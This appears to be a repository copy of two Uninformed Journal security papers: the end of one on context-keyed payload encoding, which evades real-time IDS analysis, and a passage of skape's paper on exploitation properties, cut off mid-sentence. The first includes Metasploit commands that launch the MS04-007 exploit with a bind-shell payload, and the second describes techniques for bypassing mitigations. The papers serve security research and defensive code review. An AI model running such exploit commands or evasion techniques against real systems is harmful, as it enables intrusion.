[addr]" instruction (0xa1) to retrieve the context-key from the memory
location at [addr] and store it in the same register. The update to the
Shikata ga Nai decoder stub was literally as simple as changing one
instruction, and providing that instruction with the context-key's location
address rather than a static key value directly.
The improved version of Shikata ga Nai described here is provided by this
research effort and is available in the Metasploit Framework as of version
3.1. It can be utilized as follows from the Metasploit Framework Console
command-line, after the usual exploit and payload commands:
set ENCODER x86/shikata_ga_nai
set EnableContextEncoding 1
set ContextInformationFile <application.map>
exploit
Case Study: MS04-007 vs. Windows XP SP0
The Metasploit framework currently provides an exploit for the vulnerability
described in Microsoft Security Bulletin MS04-007[13]. The vulnerable application
in this case is the Microsoft ASN.1 Library.
Before any exploitation using contextual keying can take place, the vulnerable
application must be profiled. By opening the affected library from Windows XP
Service Pack 0 in a debugger, a list of libraries that it itself includes can
be gleaned. By collecting said library DLL files from the target vulnerable
system, or an equivalent system in the lab, msfpescan can then be used to
create a memory map:
msfpescan --context-map context \
ms04-007-dlls/*
cat context/* >> ms04-007.map
After the memory map has been created, it can be provided to Metasploit and
Shikata ga Nai to encode the payload that Metasploit will use to exploit the
vulnerable system:
use exploit/windows/smb/ms04-007-killbill
set PAYLOAD windows/shell_bind_tcp
set ENCODER x86/shikata_ga_nai
set EnableContextEncoding 1
set ContextInformationFile ms04-007.map
exploit
2.3.2) Event Data
Similar to the static application data approach, transient data may also be
used as a context-key so long as it persists long enough for the decoder stub
to access it. Consider the scenario of a DNS server which is vulnerable to an
overflow when parsing an incoming host name or address look-up request. If
portions of the request are stored in memory prior to the vulnerability being
triggered, the data provided by the request could potentially be used for
contextual keying if it's location is predictable. Values such as IP
addresses, port numbers, packet sequence numbers, and so forth are all
potentially viable for use as a context-key.
2.3.3) Supplied Data
Similar to Event Data, an attacker may also be able to supply key data for
later use to the memory space of the target application prior to exploitation.
Consider the scenario of a caching HTTP proxy that exhibits the behavior of
keeping recently requested resources in memory for a period of time prior to
flushing them to disk for longer-term storage. If the attacker is aware of
this behavior, the potential exists for the attacker to cause the proxy to
retrieve a malicious web resource which contains a wealth of usable
context-key data. Even if the attacker cannot predict where in memory the
data may be stored, by having control of the data that is being stored other
exploitation techniques such as egg hunting[14, 9][15] may be used by a
decoder-stub to locate and retrieve context-key information when its exact
location is unknown.
2.4) Temporal Keys
The concept of a temporal address was previously introduced by the paper
entitled Temporal Return Addresses: Exploitation Chronomancy[16, 3]. In
summary, a temporal address is a location in memory which holds timer data of
some form. Potential types of timer data stored at a temporal address include
such data as the system date and time, number of seconds since boot, or a
counter of some other form.
The research presented in the aforementioned paper focused on leveraging the
timer data found at such addresses as the return address used for
vulnerability exploitation. As such, the viability of the data found at the
temporal address was constrained by two properties of the data defined as
scale, and period. These two properties dictate the window of time during
which the data found at the temporal address will equate to the desired
instructions. Another potential constraint for use of a temporal address as
an exploit return address stems from the fact that the value contained at the
temporal address is called directly for use as an executable instruction. If
the memory range it is contained within is marked as non-executable such as
with the more recent versions of Windows[16, 19], attempting use in this manner
will cause an exception.
For the purpose that temporal addresses will be employed here, such strict
constraints as those previously mentioned do not exist. Rather, the only
desired property of the data stored at the temporal address which will be used
as a context-key is that it does not change, or as in the case of temporal
data, does not change during the time window in which we intend to use it.
Due to this difference in requirements, the actual content of the temporal
address is somewhat irrelevant and therefore is not constrained to a
time-window in either the future or the past during which the data found at
the temporal address will be fit for purpose. The viable time-window in the
case of use for contextual keying is entirely constrained by duration rather
than location along the time-line. Due to the values at different byte
offsets within data found at a temporal address having differing update
frequencies, selection of key data from these values produces varying duration
time-windows during which the values will remain constant. By using single
byte, dual byte, or otherwise relatively short context-keys, and carefully
selecting from the available byte values stored within the timer found at the
temporal address, the viable time-window chosen can be made to be quite
lengthy.
2.4.1) Context-Key Selection
Provided by the previously mentioned temporal return address research effort
is a very useful tool called telescope[16, 8]. The tool's function is to analyze a
running process' memory for potential temporal addresses and report them to
the user. By using this tool, potential context-key values and the addresses
at which they reside can be respectively predicted and identified.
The temporal return addresses paper also revealed a section of memory that is
mapped into all processes running on Windows NT, or any other more recent
Windows system, called SharedUserData[16, 17]. The interesting properties of the
SharedUserData region of a process' address space is that it is always mapped
into memory at a predictable location and is required to be backwards
compatible with previous versions. As such, the individual values contained
within the region will always be at the same offset to it's predictable base
address. One of the values contained within this region of memory is the
system time, which will be used in the examples to follow.
Remotely Determining Time
Methods and techniques for profiling a target system's current time is outside
of the scope of this paper, however the aforementioned paper on temporal
return addresses[16, 13-15] offers some insight. Once a target system's
current time has been identified, the values found at various temporal
addresses in memory can be readily predicted to varying degrees of accuracy.
Time-Window Selection
It is important to note that when using data stored at a temporal address as a
context-key, parts of that value are likely to be changing frequently.
Fortunately, the key length being used may not require use of the entire timer
value, and as such the values found at the byte offsets that are frequently
changing can likely be ignored. Consider the SystemTime value from the
Windows SharedUserData region of memory. SystemTime is a 100 nanosecond timer
which is measured from January 1st, 1601, is stored as a KSYSTEM_TIME
structure, and is located at memory address 0x7ffe0014 on all versions of
Windows NT[16, 16]:
0:000> dt _KSYSTEM_TIME
+0x000 LowPart : Uint4B
+0x004 High1Time : Int4B
+0x008 High2Time : Int4B
Due to this timer's frequent update period, granularity, and scale, some of
the data contained at the temporal address will be too transient for use as a
context-key. The capacity of SystemTime is twelve bytes, however due to the
four bytes labeled as High2Time having an identical value as the four bytes
labeled as High1Time, only the first eight bytes are relevant as a timer. As
shown by the calculations provided by the temporal return addresses paper[16,
10], reproduced below as Figure , it is only worth focusing on values
beginning at byte index four of the SystemTime value, or the four bytes
labeled as High1Time located at address 0x7ffe0018.
+------+----------------------------------+
| Byte | Seconds (ext) |
+------+----------------------------------+
| 0 | 0 (zero) |
| 1 | 0 (zero) |
| 2 | 0 (zero) |
| 3 | 1 (1 sec) |
| 4 | 429 (7 mins 9 secs) |
| 5 | 109951 (1 day 6 hours 32 mins) |
| 6 | 28147497 (325 days 18 hours) |
| 7 | 7205759403 (228 years 179 days) |
+------+----------------------------------+
It is also interesting to note that if the payload encoder only utilizes a
single byte context-key, it may not even be required that the attacker
determine the target system's time, as the value at byte index six or seven of
the SystemTime value could be used requiring only that the attacker guess the
system time to within a little less than a year, or to within 228 years,
respectively.
3) Weaknesses
Due to the cryptographically weak properties of using functions such as XOR to
obfuscate data, there exist well known attacks against these methods and their
keying information. Although payload encoders which employ XOR as their
obfuscation algorithm have been discussed extensively throughout this paper,
it is not the author's intent to tie the the contextual keying technique
presented here to such algorithms. Rather, contextual keying could just as
readily be used with cryptographically strong encoding algorithms as well. As
such, attacks against the encoding algorithm used, or specifically against the
XOR algorithm, are outside the scope of this paper and will not be detailed
herein.
4) Conclusion
While the use of context-keyed payload encoders likely won't prevent a
dedicated forensic analyst from successfully performing an off-line analysis
of an exploit's encoded payload, the system it was targeting, and the target
application in an attempt to discover the key value used, use of the
contextual keying technique will prevent an automated system from decoding the
payload in real-time if it does not have access to, or an automated method of
constructing, an adequate memory map of the target from which to retrieve the
key.
As systems hardware technology and software capability continue to improve,
network security and monitoring systems will likely begin to join the few
currently existing systems[5, 2-4][4] that attempt to perform this type of real-time
analysis of suspected network exploit traffic, and more specifically, exploit
payloads.
4.1) Acknowledgments
The Author would like to thank H.D. Moore and Matt Miller a.k.a. skape for
their assistance in development of the improved Metasploit implementation of
the Shikata ga Nai payload encoder as Proof of Concept as well as the
supporting tools provided by this research effort.
References
[1] Ivan Arce. The shellcode generation. IEEE Security & Privacy,
2(5):72-76, 2004.
[2] skape. Implementing a custom x86 encoder. Uninformed Journal, 5(3),
September 2006.
[3] Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel
Mehta, Riley Hassell. The Shellcoder's Handhook: Discovering and
Exploiting Security Holes. John Wiley & Sones, 2004.
[4] Paul Baecher and Markus Koetter. libemu. http://libemu.mwcollect.org/,
2007.
[5] R. Smith, A. Prigden, B. Thomason, and V. Shmatikov. Shellshock: Luring
malware into virtual honeypots by emulated response. October 2005.
[6] SkyLined and Pusscat. Alpha2 alphanumeric mixedcase encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:alpha_mixed.
[7] SkyLined and Pusscat. Alpha2 alphanumeric unicode mixedcase encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:unicode_mixed.
[8] H.D. Moore and spoonm. Call+4 dword xor encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:call4_dword_xor.
[9] spoonm. Polymorphic xor additive feedback encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:shikata_ga_nai.
[10] vlad902. Single-byte xor countdown encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:countdown.
[11] Microsoft. Microsoft security bulletin ms06-040.
http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx, August
2006.
[12] |)ruid. smem-map - the static memory mapper.
https://sourceforge.net/projects/smem-map.
[13] Microsoft. Microsoft security bulletin ms04-007.
http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx,
February, 2004.
[14] The Metasploit Staff. Metasploit 3.0 Developer's Guide.
The Metasploit Project, December 2005.
[15] skape. Safely searching process virtual address space.
http://hick.org/code/skape/papers/egghunt-shellcode.pdf, September 2004.
[16] skape. Temporal return addresses. Uninformed Journal, 2(2), September
2005.
[17] SweetScape Software. 010 editor. http://www.sweetscape.com/010editor/,
2002.
[18] |)ruid. Memorymap.bt. http://druid.caughq.org/src/MemoryMap.bt, 2007.
Appendix
A) Memory Map File Specification
The memory map files created by this research effort's supporting tools adhere
to the file format specification described here. The file format is designed
specifically to be simple, light weight, and versatile.
A.1) File Format
An entire memory map file is comprised of individual data records concatenated
together. These individual data records represent a chunk of data found in a
process's memory space. This simple format allows for multiple memory map
files to be further concatenated to produce a single larger memory map file.
Individual data records are comprised of the following elements:
+----------+------------+--------------+
| Bit-Size | Byte-Order | Element |
+----------+------------+--------------+
| 8 | n/a | Data Type |
| 32 | big-endian | Base Address |
| 32 | big-endian | Size |
| Size | n/a | Data |
+----------+------------+--------------+
A.2) Data Type Values
The Data Type values are currently defined in the following table:
+-------+-------------------+
| Value | Type |
+-------+-------------------+
| 0 | Reserved |
| 1 | Static Data |
| 2 | Temporal Data |
| 3 | Environment Data |
+-------+-------------------+
A.3) File Parsing
Parsing of a memory map file is as simple as beginning with the first byte in
the file, reading the first three elements of the data record as they are of
fixed size, then using the last of those three elements as size indicator to
read the final element. If any data remains in the file, there is at least
one more data record to be read.
To provide for easy parsing and review of memory map files, an 010 Editor
template is provided by this research effort.

875
uninformed/9.4.txt Normal file
View File

@ -0,0 +1,875 @@
Improving Software Security Analysis using Exploitation Properties
12/2007
skape
mmiller@hick.org
Abstract
Reliable exploitation of software vulnerabilities has continued to become more
difficult as formidable mitigations have been established and are now included
by default with most modern operating systems. Future exploitation of
software vulnerabilities will rely on either discovering ways to circumvent
these mitigations or uncovering flaws that are not adequately protected.
Since the majority of the mitigations that exist today lack universal bypass
techniques, it has become more fruitful to take the latter approach. It is in
this vein that this paper introduces the concept of exploitation properties
and describes how they can be used to better understand the exploitability of
a system irrespective of a particular vulnerability. Perceived exploitability
is of utmost importance to both an attacker and to a defender given the
presence of modern mitigations. The ANI vulnerability (MS07-017) is used to
help illustrate these points by acting as a simple example of a vulnerability
that may have been more easily identified as code that should have received
additional scrutiny by taking exploitation properties into consideration.
1) Introduction
Modern exploit mitigations have become formidable opponents with respect to
the effect they have on reliable exploitation. Some of the more substantial
modern mitigations include GuardStack (GS), SafeSEH, DEP (NX), ASLR, pointer
encoding, and various heap improvements[8, 9, 10, 15, 24, 3, 4]. The fact
that there have been very few public exploits that have been able to
universally bypass all of these mitigations at once is a testament to the
resilience of these techniques working in concert with one another. It is
obvious that the absence of a given mitigation directly contributes to the
exploitability of the associated code. Likewise, it is also well known that
most mitigations have situations in which they will offer little to no
protection[5, 16, 18, 20, 2, 4]. For instance, in certain cases, it may be
possible to perform a partial overwrite on Windows Vista to defeat ASLR due to
the fact that only 15 bits of most 32-bit addresses may be affected by
randomization[2, 17]. Other mitigations also have situations where they may
not provide adequate coverage.
Given the fact that the majority of mitigations have known limitations, it
makes sense to consider where this information might be useful. In the field
of program analysis, whether it be manual, static, or dynamic, the question of
scoping is often pertinent. This question typically revolves around figuring
out what areas of code should be reviewed and what precedence, if any, should
be assigned to different regions. Typical approaches taken to accomplish this
often involve identifying code that straddles a trust boundary or performs
complex operations reachable from a trust boundary. However, depending on
one's perspective, this type of approach is insufficient in the face of modern
mitigations because it may result in areas of code being reviewed that are
adequately protected by all mitigations.
To help address this perceived deficiency, this paper introduces the concept
of exploitation properties and describes how they can be used to provide a
better understanding of exploitability of a system if a vulnerability is found
to be present. Regions of code that are found to have a number of distinct
exploitation properties may be more interesting from an exploitation
standpoint and therefore may warrant additional scrutiny from a program
analysis perspective. The use of exploitation properties may benefit both an
attacker and a defender. For example, companies may wish to perform targeted
reviews on areas of code that may be more trivially exploited in an effort to
prevent reliable exploits from being released in the future. Likewise, an
attacker searching for a vulnerability may wish to avoid auditing regions of
code that are likely to be more difficult to exploit.
Exploitation properties represent additional criteria that can be used when
attempting to better understand the security aspects of a program. Annotating
regions of code with exploitation properties makes it possible to use set
unions and intersections to identify the subset of interesting regions of code
for a particular analysis problem. For example, an attacker may wish to
determine the regions of code that may permit the use of traditional
stack-based buffer overflow techniques as well as permitting a partial
overwrite of a return address in order to defeat ASLR. Using these two
exploitation properties as criteria, a narrowed subset can be produced
which contains only those regions which meet both criteria by intersecting
those regions that have both exploitation properties. For the purpose of
this paper, the term narrowing is not used in the strict mathematical
sense; rather, this paper uses narrowing to describe the process of
constraining the scope of analysis through the use of specific criteria.
The concept of using automated analysis as a precursor to more strenuous
program analysis is certainly not new. There have been many tools ranging
from the simple detection of calls to strcpy to much more sophisticated forms
of static analysis. Still, the use of exploitation properties can be seen as
an additional set of data points which may be useful in the context of program
analysis given the hypothesis that most reliably exploitable security
vulnerabilities are being pushed into areas of code that are less affected by
mitigations.
The concept of exploitation properties is presented as follows. Section 2
categorizes and defines a limited number of concrete exploitation properties.
Section 3 provides a concrete example of using exploitation properties to help
identify the function that contained the ANI vulnerability. Section 4
describes some potential ways in which exploitation properties can be applied.
Section 5 gives a brief description of future work involving exploitation
properties.
2) Exploitation Properties
Exploitation properties describe the ease with which an arbitrary
vulnerability might be exploited. An understanding of a system's perceived
exploitability can provide useful insights when attempting to establish the
risk factors associated with it. An example of this can be seen in threat
modeling where the DREAD model of classifying risk includes a high-level
evaluation of exploitability as one of the risk factors[14]. It is important
to note that exploitation properties do not provide any indication that a
vulnerability exists; instead, they are only meant to convey information about
how easily a vulnerability could be exploited. The concept of an exploitation
property can be broken into different categories which are tied to the
configuration or context that the property is associated with. Examples of
these categories include platforms, processes, binary modules, functions, and
so on.
The following subsections provide concrete examples to better illustrate the
concept of an exploitation property. These examples are given by showing what
implications a property has with respect to exploitation as well as how a
property might be derived. It should be noted that the examples given in this
paper do not represent a complete, exhaustive set of exploitation properties.
2.1) Platform Properties
Exploitation properties associated with a platform are meant to illustrate how
easily a vulnerability may be exploited when a given platform configuration,
such as the operating system or architecture, is used. For example, Windows
2000 does not include support for enforcing non-executable pages. This
implies that any vulnerability found within an application that runs in the
context of the Windows 2000 platform may be exploited more easily. An
understanding of exploitation properties that are associated with a platform
may be useful when attempting to assess the risk of applications that might
run on multiple platforms. There are many other examples of exploitation
properties that are tied to platforms. In order to limit the scope of this
document, platform exploitation properties are not discussed at length.
2.2) Process Properties
Process exploitation properties carry some information about how easily
vulnerabilities found within the context of a running process may be
exploited. For example, Internet Explorer running on 32-bit versions of
Windows Vista do not make use of hardware-enforced DEP (NX) by default. This
means that any vulnerabilities found within code that runs in the context of
Internet Explorer will not be protected by non-executable regions. An
understanding of exploitation properties that are associated with a process
context can help to provide a better understanding of the risks associated
with code that may run in the context of a given process. In order to limit
the scope of this document, process exploitation properties are not discussed
at length.
2.3) Module Properties
Module exploitation properties are used to illustrate the effect that a
particular binary module has on ease of exploitation. This category of
properties is useful when attempting to identify binaries that may be more
easily exploited if a vulnerability is found within them or in code that
depends on them. This subsection describes two examples of module
exploitation properties.
2.3.1) No Support for ASLR
Windows Vista was the first major release of Windows to include a built-in
implementation of Address Space Layout Randomization (ASLR)[15,24]. In order
to head off potential application compatibility issues, Microsoft chose to
make ASLR an opt-in feature by requiring binaries to be compiled with a new
compiler switch (/dynamicbase)[21]. This compiler switch is responsible for
setting a bit (0x40) in the DllCharacteristics that are defined within a
binary. If this bit is set, the Windows kernel will attempt to randomize the
base address of the binary when it is mapped into memory the first time. If
the bit is not set, the binary will not have its base address randomized,
although it could be relocated in memory if the binary's preferred region is
already occupied by another allocation. As such, any binary that does not
support ASLR may be mapped at a predictable location within a process address
space at execution time. This can allow an attacker to make assumptions about
the address space which may make exploitation easier if a vulnerability is
found within any code that is mapped into the same address space as the module
of interest.
2.3.2) No Support for SafeSEH
With Visual Studio 2003, Microsoft introduced a compile-time change known as
SafeSEH which attempts to act as a mitigation for the SEH overwrite attack
vector[5,9]. SafeSEH works by adding a static list of known good exception
handlers that are considered valid as metadata within a given binary.
Binaries that support SafeSEH allow the exception dispatcher to perform
additional checks when dispatching exceptions. The most important check
involves determining if an exception handler that is found to exist within the
mapped region of a given binary is actually considered to be one of the safe
exception handlers. If the exception handler is not a safe exception handler,
the exception dispatcher can take steps to prevent it from being called. This
behavior works to mitigate the potential exploitation vector.
In order to communicate this information to the exception dispatcher, modern
PE files include fields in the load config data directory which hold the
offset of the safe exception handler table and the number of elements found
within the table. The load config data directory contains meta data that is
useful to the dynamic loader such as information about safe exception
handlers, the module's global security cookie address, and so on[13]. The
following output from dumpbin.exe illustrates what this might look like:
310751E0 Safe Exception Handler Table
1 Safe Exception Handler Count
Safe Exception Handler Table
Address
--------
310357D1 __except_handler4
Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
unless every binary that is loaded into an address space has been compiled to
make use of SafeSEH. If a binary has not been compiled to make use of
SafeSEH, an attacker may be able to use any address found within the binary's
memory mapping as an exception handler in conjunction with an SEH overwrite.
2.4) Function Properties
Function exploitation properties convey information about how a function
contributes to the exploitability of an application. For example, a function
might make it possible to use certain exploitation techniques that might
otherwise be prevented if mitigations were present. Alternatively, a function
might simply assist in the exploitation process. Function exploitation
properties are especially useful because they provide more detailed
information than exploitation properties that are derived from the platform,
process, or module context.
2.4.1) Absence of GuardStack
The GuardStack (GS) support included with versions of the Microsoft Visual
Studio compiler since 2002 offers a compile-time mitigation to traditional
stack-based buffer overflows[23]. It supports this through a combination of a
random canary inserted into a stack frame at runtime and an intelligent stack
frame layout algorithm. The random canary is pushed onto the stack when a
function is called and then popped off the stack and validated prior to
function return. If the canary does not match the expected value, it is
assumed that a stack-based buffer overflow occurred and that the process
should be terminated.
Since the initial release of GS support a number of techniques have been
described that could be used to bypass or weaken it[5, 16, 20]. While these
techniques were at one time useful or have not yet been fully realized, the
author assumes that most would agree that the GS implementation provided by
the most recent compiler is robust (with the exception of SEH). There is
currently no publicly known universal bypass technique for GS that the author
is aware of. Given this assumption, functions that are protected by GS become
less interesting from the standpoint of identifying stack-based buffer
overflows. On the other hand, functions that are not protected by GS can
instantly be qualified as interesting targets for review. This is especially
true with binaries that have been compiled with GS support but contain a
number of functions that the compiler has chosen not to compile with GS
protections. This choice is made by taking into account certain conditions such
as the presence or absence of local variables that are declared as fixed-size
arrays.
As previous research has illustrated[27], it is possible to identify functions
that have not been compiled to use GS through the use of simple static
analysis tools. It is also possible to further refine the approaches
described in previous research if one has symbols and one assumes that the
most recent compiler was used. This can be accomplished by analyzing the call
graph of an executable and noting the set of functions that do not call
securitycheckcookie. Considered another way, the same set of functions can be
identified by taking the set of all functions contained within a binary less
the subset that call securitycheckcookie. The set of functions that is
identified by either approach can be annotated with an exploitation property
that indicates that they may contain stack-based buffer overflows that would
not be hindered by GS.
It may also be prudent to take the compiler version that was used into
consideration when analyzing binaries. This is important due to the fact that
older versions of the compiler used a GS implementation that could be
trivially defeated in certain circumstances[16]. For example, previous versions
of GS did not layout the stack frame in a manner that would prevent an
attacker from overwriting other local variables and function arguments. In
scenarios where this occurred and an overwritten local variable or parameter
was dereferenced (such as by invoking a function pointer), the mitigation
offered by GS would be meaningless. Thus, a secondary exploitation property
could involve identifying functions where attacks such as the one described
above could be possible.
2.4.2) Partial Overwrite Feasibility
One of the unique consequences of implementing Address Space Layout
Randomization (ASLR) on Windows is the limitation that the system allocation
granularity imposes on the number of bits that can be randomized within most
memory allocations. In particular, the allocation granularity used by Windows
enforces strict 16-page alignment for the base addresses of most memory
mappings in user-mode. This restriction means that it is only possible to
introduce entropy into the low 15 bits of the high-order 16 bits of a 32-bit
memory mapping[17]. While this may sound odd at first glance, the high-order two
bits are not randomized due to the divide between kernel and user-mode. This
assumes that a machine is booted without /3GB. The low-order 16 bits remain
unchanged relative to the high-order bits. This caveat means that it may be
possible to perform a partial overwrite of an address and thus bypass the
security features offered by ASLR[2]. However, the ability to perform a partial
overwrite also relies on the presence of useful code or data within a region
that is relative to the address that is being overwritten.
To visualize how this type of information might be useful, consider a scenario
where an attacker is performing a partial overwrite of a return address on the
stack. In this situation, it is often necessary for one or more useful
opcodes to be present at an address that is 16-page relative to the return
address. For example, consider a scenario where the function may have a
vulnerability that would permit a partial overwrite. In this example, is
called by and . In order to permit the use of a partial overwrite, a useful
opcode must be found within the same 16-page aligned region that either or
reside on. If a useful opcode is present, an exploitation property can be
attached to in order to indicate that a partial overwrite may be feasible due
to the presence of a useful opcode within the same 16-page aligned region as
either or . For example, consider the following pseudo-disassembly
illustrating a case where the call f instruction in is on the same 16-page
region as a useful opcode:
... useful jmp on same 16-page region 0x14c1XXXX
0x14c1fc04 jmp esp
... entry point to h()
0x14c1a910 push ebp
0x14c1a911 mov ebp, esp
0x14c1a914 call f
... entry point to y(), not on same 16-page region
0x137f44c8 push ebp
While this captures the basic concept, a better approach might be to view a
binary in a different way. For example, consider the following approach to
drawing the same conclusion: for each code region that contains a useful
opcode, identify the subset of functions that are called from call sites
within the same 16-page aligned region as the useful opcode. This has the
effect of annotating all of the child functions that could potentially
leverage a partial overwrite of the return address with respect to a
particular collection of opcodes.
One important point that must be made about this exploitation property is that
is entirely dependent upon the definition of "useful code or data".
Exploitation is very much an art and it goes without saying that attempting to
constrain the approaches that an attacker might make use of is likely to be
folly. However, defining a known-set of useful opcodes and using that set as
a base with which to draw the above conclusion can be said to be better than
not doing so at all.
2.4.3) Function or Parent Registers an Exception Handler
One of the unique exploitation vectors that exists in 32-bit programs that run
on Windows is known as an SEH overwrite[5]. An SEH overwrite makes it possible
to gain control of execution flow by overwriting an exception registration
record on the stack. From an exploitation perspective, the act of registering
an exception handler within a function opens up the possibility of making use
of an SEH overwrite. Since exception handlers are chained, the act of
registering an exception handler also implicates any functions that are
children of a function that registers the exception handler. This makes it
possible to define an exploitation property that illustrates the possibility
of an SEH overwrite being abused within the scope of a specific set of
functions. Detecting this property can be as simple as signaturing the
compiler generated code that is used to generate and register an exception
handler within a function. An example of two functions, and , that would
meet this criteria can be seen below:
void f() {
__try {
g();
} __except(EXCEPTION_EXECUTE_HANDLER) {
}
}
void g() {
...
}
In addition to this information being useful from an SEH overwrite
perspective, it may also benefit an attacker in situations where an exception
handler simply swallows any exceptions that are dispatched without crashing
the process[1]. In the example given above, any exception that occurs in the
context of will be swallowed by without necessarily crashing the process.
This behavior may allow an attacker to retry their exploitation attempt
multiple times, thus enabling a bruteforce attack that would otherwise not be
feasible. This can make defeating ASLR more feasible.
2.4.4) Function is an Exception Handler
The introduction of SafeSEH as a modern compile-time mitigation has caused the
particulars of how exception handlers are implemented to become more
interesting. This has to do with the fact that SafeSEH restricts the set of
exception handlers that may be called by the exception dispatcher to those
that are specified as being valid within the scope of a given binary. As
discussed previously in this paper, SafeSEH prevents traditional SEH
overwrites from being able to use any address as the overwritten exception
handler. While this is effective in its primary intent, there is still the
possibility that a valid exception handler can be abused to make exploitation
more feasible[1]. This scenario is restricted to EH3 and prior exception
handlers as EH4 includes a check of a cookie before dispatching exceptions.
As such, it may be useful to flag the regions of code that are associated with
EH3 and prior exception handlers, including language-specific exception
handlers, as being potentially interesting from an exploitation perspective.
Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
unless every binary that is loaded into a process address space has been
compiled to make use of SafeSEH. If a binary has not been compiled to make
use of SafeSEH, an attacker may be able to use any address found within the
binary's memory mapping as an exception handler in the context of an SEH
overwrite. This may make exploitation more feasible.
3) Case Study: MS07-017
The animated cursor (ANI) vulnerability was discovered by Alexander Sotirov in
late 2006 and patched by Microsoft with the MS07-017 critical update in April,
2007 . Apart from being a client-side vulnerability that was exposed through
web-browsers and other mediums, the ANI vulnerability was one of the first
notable security issues that affected Windows Vista. It was notable due to
the simple fact that even though Microsoft had touted Windows Vista as being
the most secure operating system to date, the exploits that were released for
the ANI vulnerability were very reliable. These exploits were able to ignore
or defeat the protections offered by mitigations such as GS, DEP, and even
Vista's newest mitigation: ASLR.
To better understand how this was possible it is important to dive deeper into
the details of the vulnerability itself. gives a brief description of the
ANI vulnerability and some of the techniques that were used to successfully
exploit it. Following this description, illustrates how exploitation
properties, in combination with another class of properties, can be used to
detect functions that may contain vulnerabilities similar to the ANI
vulnerability. This is meant to help illustrate the perceived benefits of
applying the concept of exploitation properties to aide in the process of
identifying regions of code that may deserve additional scrutiny based on
their perceived exploitability.
3.1) Background
While the ANI vulnerability was certainly unique, it was not the first time
the animated cursor code was found to have a security issue. Microsoft patched
an issue that was almost exactly the same as MS07-017 with MS05-002 roughly
two years prior. In both cases, the underlying security issue was related to
a failure to properly validate input that was derived from the contents of an
animated cursor file. Alexander Sotirov provided much of the initial research
on the ANI vulnerability and also gave an excellent write-up to its effect[22].
This paper will only attempt to highlight the flaw.
The vulnerability itself was found in user32!LoadAniIcon which is responsible
for processing a number of different chunks that may be contained within an
animated cursor file. Each chunk is a TLV (Type-Length-Value) as described
by the following structure:
struct ANIChunk
{
char tag[4]; // ASCII tag
DWORD size; // length of data in bytes
char data[size]; // variable sized data
}
Keeping this structure in mind, the flaw itself can be seen in the abbreviated
pseudo-code below as modified slightly from Sotirov's original write-up:
01: int LoadAniIcon(struct MappedFile* file, ...) {
02: struct ANIChunk chunk;
03: struct ANIHeader header; // 36 byte structure
04: while (1) {
05: // read the first 8 bytes of the chunk
06: ReadTag(file, &chunk);
07: switch (chunk.tag) {
08: case 'anih':
09: // read chunk.size bytes into header
10: ReadChunk(file, &chunk, &header);
On line 6, the chunk header is read into the local variable chunk using
ReadTag which populates the chunk's tag and size fields. If the chunk's tag
is equal to 'anih', the data associated with the chunk is read into the header
local variable using ReadChunk on line 10. The problem is that ReadChunk uses
the size field of the chunk as the amount of data to read from the file.
Since header is a fixed-size (36 byte) data structure and the chunk's size can
be variable, a trivial stack-based buffer overflow may occur if more than 36
bytes are specified as the chunk size. In terms of the vulnerability, that's
all there is to it, but the implications from an exploitation perspective are
where things start to get interesting.
When attempting to exploit this vulnerability it may at first appear that all
attempts to do so would be futile. Given Vista's security push, an attacker
would be justified in thinking that surely the LoadAniIcon function is
protected by a GS cookie. This point is especially justified considering the
majority of all binaries shipped with Windows Vista have been compiled with GS
enabled[27]. However, there are indeed circumstances where the compiler will
choose to not enable GS for a specific function. As chance would have it, the
compiler chose not to enable GS for the LoadAniIcon function because of the
simple fact that it does not contain any characteristics that would suggest
that a stack-based buffer overflow might be possible (such as the use of
stack-allocated arrays). This means that an attacker is able to make use of
exploitation techniques that are associated with traditional stack-based
buffer overflows. While this drastically increases the chances of being able
to produce a reliable exploit, there are still other mitigations that are of
potential concern.
Another mitigation that might be concerning in most circumstances is
hardware-enforced DEP (NX). This would generally prevent an attacker from
being able to run arbitrary code within regions that are not marked as
executable (such as the stack and the heap). However, as fate would have it,
Internet Explorer is configured to not run with DEP enabled. This immediately
removes this concern from the equation for exploits that attempt to trigger
the ANI vulnerability through Internet Explorer. With DEP out of the picture,
ASLR becomes a weakened but still potentially significant hurdle.
While it may appear that ASLR would be challenging to defeat in most
circumstances, this particular vulnerability provides an example of two
different ways in which ASLR can be bypassed. The simplest approach, as taken
by Sotirov, involves making use of the fact that Internet Explorer is not
compiled with support for ASLR and therefore can be found at a fixed address
within the address space. This allows an attacker to make use of opcodes
contained within iexplore.exe's memory mapping. A second approach, as taken
by the author, involves using a partial overwrite to ignore the effects of
ASLR completely. The details relating to how a partial overwrite works were
explained in 2.4.2. In either case, an attacker is able to reliably defeat Vista's
ASLR.
To compound the problem, the particulars of the context in which this
vulnerability occur make it easier to exploit even without the presence of
mitigations. This improved reliability comes from the fact that the
LoadAniIcon function is wrapped in an exception handling context that simply
swallows exceptions that are encountered. This makes it possible for an
exploit to fail without actually crashing the process, thus allowing the
attacker to try multiple times without having to worry about making a mistake
that crashes the process. When all is said and done, the simplicity of the
vulnerability and the ease with which mitigations could be bypassed are what
lead to the ANI vulnerability being quite unique. Given the fact that this
vulnerability can be so easily exploited, it is prudent to describe how it
could have been detected as being a high risk function.
3.2) Detection
The ease of exploitability associated with the ANI vulnerability makes it an
obvious candidate for study with respect to the exploitation properties that
have been described in this paper. It should be possible to use extremely
simple criteria to accomplish two things. First, the criteria must identify
the LoadAniIcon function. Second, the criteria should be unique enough to
limit the size of the narrowed subset. Reducing the subset size is beneficial
as it may permit the use of more complex program analysis tools which can
further constrain or explicitly identify instances of vulnerabilities.
Determining the specific criteria that is needed to identify the LoadAniIcon
function can help illustrate how one can make use of exploitation properties.
Given the description of the ANI vulnerability, one can easily deduce some of
the more interesting properties that it has.
An exploitation property that one might immediately observe is that the
LoadAniIcon function does not make use of GS (2.4.1). This makes it possible to
define criteria which states that only functions that have not been compiled
with GS should be considered. Functions that have been compiled with GS are
inherently less interesting for the purpose of this exercise due to the fact
